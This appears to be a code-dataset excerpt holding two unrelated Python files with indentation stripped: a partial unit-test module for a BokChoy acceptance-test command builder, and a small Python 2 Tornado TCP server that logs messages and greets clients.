suite = BokChoyTestSuite('')
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_suite_spec(self):
spec = 'test_foo.py'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_class_spec(self):
spec = 'test_foo.py:FooTest'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_testcase_spec(self):
spec = 'test_foo.py:FooTest.test_bar'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_spec_with_draft_default_store(self):
spec = 'test_foo.py'
suite = BokChoyTestSuite('', test_spec=spec, default_store='draft')
name = 'tests/{}'.format(spec)
self.assertEqual(
suite.cmd,
self._expected_command(name=name, store='draft')
)
def test_invalid_default_store(self):
# the cmd will dumbly compose whatever we pass in for the default_store
suite = BokChoyTestSuite('', default_store='invalid')
name = 'tests'
self.assertEqual(
suite.cmd,
self._expected_command(name=name, store='invalid')
)
def test_serversonly(self):
suite = BokChoyTestSuite('', serversonly=True)
self.assertEqual(suite.cmd, None)
def test_verify_xss(self):
suite = BokChoyTestSuite('', verify_xss=True)
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name, verify_xss=True))
def test_verify_xss_env_var(self):
self.env_var_override.set('VERIFY_XSS', 'False')
with self.env_var_override:
suite = BokChoyTestSuite('')
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name, verify_xss=False))
def test_test_dir(self):
test_dir = 'foo'
suite = BokChoyTestSuite('', test_dir=test_dir)
self.assertEqual(
suite.cmd,
self._expected_command(name=test_dir)
)
def test_verbosity_settings_1_process(self):
"""
Using 1 process means paver should ask for the traditional xunit plugin for plugin results
"""
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else ''
),
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=1)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
def test_verbosity_settings_2_processes(self):
"""
Using multiple processes means specific xunit, coloring, and process-related settings should
be used.
"""
process_count = 2
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else '',
),
u"-n {}".format(process_count),
"--color=no",
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=process_count)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
def test_verbosity_settings_3_processes(self):
"""
With the above test, validate that num_processes can be set to various values
"""
process_count = 3
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else '',
),
u"-n {}".format(process_count),
"--color=no",
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=process_count)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from tornado import ioloop, httpclient, gen
from tornado.gen import Task
from tornado.tcpserver import TCPServer
import pdb, time, logging
from tornado import stack_context
from tornado.escape import native_str
#Init logging
def init_logging():
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s -%(module)s:%(filename)s-L%(lineno)d-%(levelname)s: %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logging.info("Current log level is : %s", logging.getLevelName(logger.getEffectiveLevel()))
class MyServer(TCPServer):
def __init__(self, io_loop=None, **kwargs):
TCPServer.__init__(self, io_loop=io_loop, **kwargs)
def handle_stream(self, stream, address):
TCPConnection(stream, address, io_loop=self.io_loop)
class TCPConnection(object):
def __init__(self, stream, address, io_loop):
self.io_loop = io_loop
self.stream = stream
self.address = address
self.address_family = stream.socket.family
self.EOF = b' END'
self._clear_request_state()
self._message_callback = stack_context.wrap(self._on_message)
self.stream.set_close_callback(self._on_connection_close)
self.stream.read_until(self.EOF, self._message_callback)
def _on_timeout(self):
logging.info("Send message..")
self.write("Hello client!" + self.EOF)
def _on_message(self, data):
try:
timeout = 5
data = native_str(data.decode('latin1'))
logging.info("Received: %s", data)
self.io_loop.add_timeout(self.io_loop.time() + timeout, self._on_timeout)
except Exception, ex:
logging.error("Exception: %s", str(ex))
def _clear_request_state(self):
"""Clears the per-request state.
"""
self._write_callback = None
self._close_callback = None
def set_close_callback(self, callback):
"""Sets a callback that will be run when the connection is closed.
"""
self._close_callback = stack_context.wrap(callback)
def _on_connection_close(self):
if self._close_callback is not None:
callback = self._close_callback
self._close_callback = None
callback()
self._clear_request_state()
def close(self):
self.stream.close()
# Remove this reference to self, which would otherwise cause a
self._clear_request_state()
def write(self, chunk, callback=None):
"""Writes a chunk of output to the stream."""
if not self.stream.closed():
self._write_callback = stack_context.wrap(callback)
self.stream.write(chunk, self._on_write_complete)
def _on_write_complete(self):
if self._write_callback is not None:
callback = self._write_callback
self._write_callback = None
callback()
def main():
init_logging()
server = MyServer()
server.listen(8001)
ioloop.IOLoop.instance().start()
if __name__ == "__main__":
try:
main()
except Exception, ex:
print "Ocurred Exception: %s" % str(ex)
quit()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.